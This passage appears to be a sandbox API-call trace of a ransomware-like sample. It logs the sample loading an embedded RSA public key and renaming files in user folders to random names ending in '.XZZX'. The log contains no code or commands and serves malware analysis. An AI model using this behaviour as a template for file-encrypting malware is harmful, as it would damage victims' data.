HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0182.526] SetErrorMode (uMode=0x1) returned 0x1 [0182.527] lstrcpyW (in: lpString1=0x2aaf860, lpString2="A58916D017654CD0CF379F2B1B923118.XZZX" | out: lpString1="A58916D017654CD0CF379F2B1B923118.XZZX") returned="A58916D017654CD0CF379F2B1B923118.XZZX" [0182.527] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x3a27f2da, Data2=0x8782, Data3=0x4857, Data4=([0]=0x85, [1]=0xa5, [2]=0x2e, [3]=0x66, [4]=0xbd, [5]=0x4d, [6]=0x8c, [7]=0x5f))) returned 0x0 [0182.527] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\A58916D017654CD0CF379F2B1B923118.XZZX") returned 94 [0182.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0182.527] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\995A48B4264A9D2E3A27F2DA28F58176.XZZX") returned 94 [0182.527] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 662 os_tid = 0xc5c [0182.683] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.683] lstrcpyW (in: lpString1=0x2aaf460, lpString2="D9B986602FBC15FEC37446303428FA46.XZZX" | out: lpString1="D9B986602FBC15FEC37446303428FA46.XZZX") returned="D9B986602FBC15FEC37446303428FA46.XZZX" [0182.683] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0182.683] SetErrorMode (uMode=0x1) returned 0x1 [0182.684] lstrcpyW (in: lpString1=0x2aaf860, lpString2="D9B986602FBC15FEC37446303428FA46.XZZX" | out: lpString1="D9B986602FBC15FEC37446303428FA46.XZZX") returned="D9B986602FBC15FEC37446303428FA46.XZZX" [0182.684] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x22755a70, Data2=0x2c45, Data3=0x4c5f, Data4=([0]=0x84, [1]=0xe7, [2]=0x80, [3]=0xca, [4]=0xef, [5]=0xa3, [6]=0x57, [7]=0x81))) returned 0x0 [0182.684] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\D9B986602FBC15FEC37446303428FA46.XZZX") returned 94 [0182.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0182.684] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\752CA0300D34E99B22755A700FDFCDE3.XZZX") returned 94 [0182.684] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 663 os_tid = 0xc60 [0182.839] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.839] lstrcpyW (in: lpString1=0x2aaf460, lpString2="FD9D491315D8C1EEE26AF31719F0A636.XZZX" | out: lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned="FD9D491315D8C1EEE26AF31719F0A636.XZZX" [0182.839] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0182.839] SetErrorMode (uMode=0x1) returned 0x1 [0182.839] lstrcpyW (in: lpString1=0x2aaf860, lpString2="FD9D491315D8C1EEE26AF31719F0A636.XZZX" | out: lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned="FD9D491315D8C1EEE26AF31719F0A636.XZZX" [0182.839] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x2b0bd817, Data2=0xafaf, Data3=0x44f5, Data4=([0]=0xba, [1]=0x71, [2]=0xf3, [3]=0x40, [4]=0x7a, [5]=0xb3, [6]=0xf2, [7]=0xa8))) returned 0x0 [0182.839] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned 94 [0182.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0182.839] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\85D070B92F529E7B2B0BD81731FD82C3.XZZX") returned 94 [0182.839] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 664 os_tid = 0xc64 [0183.000] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.000] lstrcpyW (in: lpString1=0x2aaf460, lpString2="02D36BF7229FBF1A2D198367271CA362.XZZX" | out: lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX") returned="02D36BF7229FBF1A2D198367271CA362.XZZX" [0183.000] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0183.000] SetErrorMode (uMode=0x1) returned 0x1 [0183.000] lstrcpyW (in: lpString1=0x2aaf860, lpString2="02D36BF7229FBF1A2D198367271CA362.XZZX" | out: lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX") returned="02D36BF7229FBF1A2D198367271CA362.XZZX" [0183.000] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xd443c1a2, Data2=0xbbdf, Data3=0x4084, Data4=([0]=0x97, [1]=0x3d, [2]=0xc0, [3]=0x3e, [4]=0x88, [5]=0x36, [6]=0x98, [7]=0x84))) returned 0x0 [0183.000] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\02D36BF7229FBF1A2D198367271CA362.XZZX") returned 77 [0183.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0183.000] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\6577021E2F589EFCD443C1A232038344.XZZX") returned 77 [0183.000] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 665 os_tid = 0xc68 [0183.151] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.151] lstrcpyW (in: lpString1=0x2aaf460, lpString2="323285543E8B2CB8C06CF7B742AC1100.XZZX" | out: lpString1="323285543E8B2CB8C06CF7B742AC1100.XZZX") returned="323285543E8B2CB8C06CF7B742AC1100.XZZX" [0183.151] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0183.151] SetErrorMode (uMode=0x1) returned 0x1 [0183.151] lstrcpyW (in: lpString1=0x2aaf860, lpString2="323285543E8B2CB8C06CF7B742AC1100.XZZX" | out: lpString1="323285543E8B2CB8C06CF7B742AC1100.XZZX") returned="323285543E8B2CB8C06CF7B742AC1100.XZZX" [0183.151] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xc1785383, Data2=0x8c98, Data3=0x4866, Data4=([0]=0xb0, [1]=0x7, [2]=0x1c, [3]=0xa5, [4]=0x1c, [5]=0x66, [6]=0x92, [7]=0x1d))) returned 0x0 [0183.151] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\323285543E8B2CB8C06CF7B742AC1100.XZZX") returned 77 [0183.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0183.151] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\AD1D39C827C2C490C17853832A6DA8D8.XZZX") returned 77 [0183.151] StrStrW (lpFirst="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 666 os_tid = 0xc6c [0183.307] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.307] lstrcpyW (in: lpString1=0x2aaf460, lpString2="61C67744188385C0EADA50E91CF06A08.XZZX" | out: lpString1="61C67744188385C0EADA50E91CF06A08.XZZX") returned="61C67744188385C0EADA50E91CF06A08.XZZX" [0183.307] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0183.307] SetErrorMode (uMode=0x1) returned 0x1 [0183.307] lstrcpyW (in: lpString1=0x2aaf860, lpString2="61C67744188385C0EADA50E91CF06A08.XZZX" | out: lpString1="61C67744188385C0EADA50E91CF06A08.XZZX") returned="61C67744188385C0EADA50E91CF06A08.XZZX" [0183.307] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x98c51446, Data2=0x8add, Data3=0x4f6f, Data4=([0]=0xa8, [1]=0x29, [2]=0x35, [3]=0xf0, [4]=0x8a, [5]=0x42, [6]=0x6b, [7]=0xec))) returned 0x0 [0183.307] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\61C67744188385C0EADA50E91CF06A08.XZZX") returned 77 [0183.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0183.308] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\1F103C6E2B1668D398C514462DC14D1B.XZZX") returned 77 [0183.308] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 667 os_tid = 0xc70 [0183.462] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.462] lstrcpyW (in: lpString1=0x2aaf460, lpString2="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" | out: lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" [0183.462] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0183.462] SetErrorMode (uMode=0x1) returned 0x1 [0183.462] lstrcpyW (in: lpString1=0x2aaf860, lpString2="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" | out: lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" [0183.462] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x76e96539, Data2=0xfc75, Data3=0x459b, Data4=([0]=0xa3, [1]=0x77, [2]=0x82, [3]=0x9d, [4]=0x44, [5]=0xc7, [6]=0x6e, [7]=0x98))) returned 0x0 [0183.463] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned 77 [0183.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0183.463] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\184F5F0D44A463D776E96539474F481F.XZZX") returned 77 [0183.463] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 668 os_tid = 0xc74 [0183.623] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.624] lstrcpyW (in: lpString1=0x2aaf460, lpString2="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" | out: lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" [0183.624] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0183.624] SetErrorMode (uMode=0x1) returned 0x1 [0183.624] lstrcpyW (in: lpString1=0x2aaf860, lpString2="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" | out: lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" [0183.624] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x9a8a3a57, Data2=0xc5d, Data3=0x4c56, Data4=([0]=0xaf, [1]=0x20, [2]=0x4f, [3]=0xed, [4]=0x4c, [5]=0xb4, [6]=0x3, [7]=0x65))) returned 0x0 [0183.624] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned 77 [0183.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0183.624] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\9EF3459B03AFC33E9A8A3A57065AA786.XZZX") returned 77 [0183.624] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 669 os_tid = 0xc78 [0183.775] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.775] lstrcpyW (in: lpString1=0x2aaf460, lpString2="35A8A5603BE70712A81D33D040A3EB5A.XZZX" | out: lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned="35A8A5603BE70712A81D33D040A3EB5A.XZZX" [0183.775] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0183.775] SetErrorMode (uMode=0x1) returned 0x1 [0183.775] lstrcpyW (in: lpString1=0x2aaf860, lpString2="35A8A5603BE70712A81D33D040A3EB5A.XZZX" | out: lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned="35A8A5603BE70712A81D33D040A3EB5A.XZZX" [0183.775] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x75c7e638, Data2=0x4788, Data3=0x413a, Data4=([0]=0xbe, [1]=0x84, [2]=0x6c, [3]=0x9c, [4]=0xdf, [5]=0x29, [6]=0x28, [7]=0x75))) returned 0x0 [0183.775] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned 77 [0183.775] 